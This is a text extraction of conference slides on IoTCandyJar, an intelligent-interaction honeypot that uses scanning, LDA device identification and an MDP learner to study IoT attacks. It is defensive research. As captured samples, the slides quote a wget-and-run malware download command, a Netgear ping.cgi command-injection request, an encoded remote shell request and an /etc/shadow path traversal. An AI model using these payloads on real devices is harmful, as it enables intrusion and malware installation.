IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots...
Transcript of IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots...
![Page 1: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/1.jpg)
IoTCandyJar:TowardsanIntelligent-InteractionHoneypotforIoTDevices
![Page 2: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/2.jpg)
Bio• BlackHatVeteran(2016USA,2017Asia,2017USA).• VirusBulletin(2016,2017)• PrincipleSecurityResearcher@PANW.
MobileSecurity- DiscoverMalware- AndroidSecurity
WebSecurity- ExploitKitDetection.- BrowserSecurity.
Explore&Exploit- Fuzzing&CVEs.- Attacks.
IoTSecurity- Vulnerability.- SDN-basedSolution.
![Page 3: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/3.jpg)
Agenda
• IoTHoneypot.• IntelligentInteraction.• IoTScanner• IoT-ID• IoTLearner
![Page 4: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/4.jpg)
Theideaofhoneypotsbeganin1991.
IoTHoneypot
IoTHoneypot
Low-Interaction
High-Interaction
• Very limited level of interaction• ManuallyGenerateResponses• honeyd
• Fullyedgedoperatingsystem• Interactwithrealsystem(physical)oremulator (virtual)• GenIII
![Page 5: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/5.jpg)
ChallengestoBuildIoT-Honeypot
Low-InteractionIoTHoneypot?
HeterogeneityLackofemulator
High-InteractionIoTHoneypot?
LackofKnowledgeExpensive
![Page 6: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/6.jpg)
Intelligent-Interaction
SimulateBehaviors
AutomaticCollect IoTBehaviors Expectedbyattackers
IntelligentlyLearn ThroughInteraction
![Page 7: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/7.jpg)
WhyInteraction?
{ip}:443/img/favicon.png?v=6.0.1-1213
Attack
wget http://x.x.x.x/mal.sh; chmod 777 mal.sh; sh mal.sh;
Request Content
Request Content
MaliciousServerAddress
CVE-2016-6433
404NotFound
200OK
HONEYPOT
![Page 8: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/8.jpg)
401Unauthorized
404NotFound
200OK
ZyXEL Modem/globe
WWW-Authenticate:Basicrealm=
"NETGEARR7000”HEAD/HTTP/1.1
/etc/RT2870STA.dat IPCameraInfo/Config
CapturedPre-AttackCheck
getstatus.cgi
…
home_wan.htm
![Page 9: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/9.jpg)
ManagementComponentTransport(MCTP)
REMOTEHI_SRDK_MEDIA_GetShowAttr
MCTP/1.0
HNAP
UDP Port53413
\x00\x00 \x00 \x00\x00 \x00\x00\x00 \xD0\xA5Login: VulnerableRouter
(Netcore|Netis)
VulnerableKguardDVR
/HNAP1/ VulnerableRouter(Netgear|Linksys)
MCTP/1.0200OK
IoTProtocols
![Page 10: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/10.jpg)
EchoCommand
POST /ping.cgi HTTP/1.1referer:http://x.x.x.x/DIAG_diag.htm
IPAddr1=1&IPAddr2=2&IPAddr3=3&IPAddr4=4&ping=Ping&ping_IPAddr=12.12.12.12;
Netgear DGN2200v1-v4
… ... ... ...… ... ... ...
… ... ... ...… ... ... ...
InjectEchoCommandtoPrintRandomStringandCheckResultinResponse
echo "zP8ZDXwQCC";
zP8ZDXwQCC
![Page 11: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/11.jpg)
HoneypotInstance
HoneypotInstance
SessionTable
IoTDatabase
HoneypotInstance
LearningModel
SystemArchitecture
Raw_Request1
IoTScanner
ActiveProbing
Filter2
IoTLearner
MDP
IoT-ID
3
Raw_Response
![Page 12: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/12.jpg)
IoTScanner
AutomaticIoTBehaviorsCollector
![Page 13: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/13.jpg)
CustomizedScanningForIoTDevices
• IPFiltering
• Port Filtering
• RequestFiltering
• ExploitFiltering
![Page 14: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/14.jpg)
IPAddressFiltering
MASSCAN
![Page 15: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/15.jpg)
PortsFiltering
PrioritizetoScanTrafficonThesePorts.
![Page 16: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/16.jpg)
CapturedHoneypotTraffic(Request)
18Mà1Mà0.4M
RequestFiltering
![Page 17: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/17.jpg)
RequestTypeByPort
![Page 18: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/18.jpg)
ExploitRequestFiltering
RemoteCommandExecution(RCE).
UPnP
TR-069SOAP
/shell?%75%6E%61%6D%65%20%2D%61
Encoded
InfoDisclosure.
IdentifyShellCode
PathTransversal
InformationLeaking
../../../../etc/shadow
![Page 19: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/19.jpg)
ScanningResult
• 300Threads• 3 sectimeout• Reusetcp session
![Page 20: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/20.jpg)
IOT-ID:PINPOINTIOTDEVICE
![Page 21: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/21.jpg)
IoT-ID
•Problem:Patternmatchbasedapproachisnotenough.• Example:
• ControversialResult.• IPchange.
•Goal:• ObtainaccurateknowledgeofIoTdevice.• PinpointwithIoT-ID.
•Approach:• LDA-basedSolution.
![Page 22: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/22.jpg)
LDA-BasedSolution
• LDA• Documents,Terms,Topics.• Doc=mixtureoftopics
• ProblemFormulation• Treateachresponseasadocument• TypeoftheIoTdeviceasthetopic
• Example:• HTTPtrafficfrom6differentroutervendors.• Summarize15differenttopicsforthem.
![Page 23: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/23.jpg)
![Page 24: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/24.jpg)
IoTLearner
LearningBehaviorsFromInteractions.
![Page 25: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/25.jpg)
StateLocator
SelectResp
Selector(Model+Algorithm)
SessionTable
RawRequest
RawResponse
Req_RspMapping
feedback
![Page 26: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/26.jpg)
RandomResponding
ScanningResultforURL/HNAP1/
404NotFound(SonicWALLFW)
401Unauthorized(TRENDnet Router)
<ModelName>WRT110
</ModelName>(LinkSys)
<ModelName>DIR-615B2
</ModelName>(D-Link)
KnowledgeDatabase
/HNAP1/
RandomlySelectOne
SessionTable
<Req,Rsp,IP,Port,Proto>
Reply
AccumulateBehaviorsKnowledgeFromAttacker’sReaction
(FollowingRequest)
![Page 27: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/27.jpg)
ProblemFormulation
• Decisionepochs(t)• States(x,s)• Actions(a)• Transitionsprobabilities(T)• Rewards(r)
• Whenwereceivearequest• CurrentIncomingRequest• PotentialResponseSet• Pr(NextRequest)• CaptureMaliciousPayload.
SequentialDecisionMaking SelecttheBestResponseastheactiontosatisfyattackersandcapturethemaliciouspayload.
![Page 28: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/28.jpg)
MDPBuild
SessionTable ScanningResponses
404NotFound(SonicWALLFW)
401Unauthorized(TRENDnet)
<ModelName>WRT110
</ModelName>(LinkSys)
<ModelName>DIR-615B2
</ModelName>(D-Link)
RSP1
RSP2
RSP3
RSP4
Req_ID Rsp_ID Session_ID
0 1 0
0 2 1
0 2 2
0 2 2
0 3 3
1 0 3
… … …
/HNAP1/
Terminated
/ping.cgishellcmd
RSP3
RSP1
RSP2
RSP2
0.9
0.1
1
SOAPAction:GetDeviceSettingsshellcmd
RSP4
0.8
1
RSP3
0.2
![Page 29: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/29.jpg)
• RealCaseisMoreComplex.• CGI-Script.• EntryPoints.
• PrivilegedCGI– MediumReward.• ExploitRequest– HighReward.
![Page 30: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/30.jpg)
SessionImprovement
• RandomResponseSelectionAlgorithm• Occasionallyselectthecorrectone.
• MDPResponseSelectionAlgorithm• selectthecorrectonewithhigherprobability.
![Page 31: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/31.jpg)
ThreeTakeaways
•ChallengestobuildIoThoneypotusingtraditionalways.
•UtilizinganautomaticandintelligentwaytobuildIoThoneypot.
•Interestingpre-attackchecksandExploitationsonIoTDevice.
![Page 32: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/32.jpg)
Q&A
![Page 33: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/33.jpg)
/img/favicon.png?v=6.0.1-1213
200OK
Terminated
404
/
302Doc
moved
varpassword=“…”
xxx
/apply.cgishell
+10
/rulesimport.cgishell
+10
Username:xxPassword:xx
/login.cgi +2
/view.cgi+2
/loginpserr.stm+1
+0.5
-10
-5
![Page 34: IoTCandyJar: towards an intelligent-interaction honeypot for IoT devices · The idea of honeypots began in 1991. IoT Honeypot Honeypot IoT Low-Interaction High-Interaction • Very](https://reader031.fdocuments.in/reader031/viewer/2022022014/5b46ea147f8b9a501f8c797f/html5/thumbnails/34.jpg)
SessionTable
ScanningResponses404NotFound
(SonicWALLFW)
401Unauthorized(TRENDnet)
<ModelName>WRT110
</ModelName>(LinkSys)
<ModelName>DIR-615B2
</ModelName>(D-Link)
RSP1 RSP2
Req_ID Rsp_ID Session_ID
0 1 0
0 2 1
0 2 2
0 2 2
0 3 3
1 0 3
… … …
/HNAP1/
Terminated
/ping.cgishellcmd
RSP3
RSP1
RSP2
RSP2
0.9
0.1
1
SOAPAction:GetDeviceSettingsshellcmd
RSP4
0.8
1
RSP3
0.2
RSP3 RSP4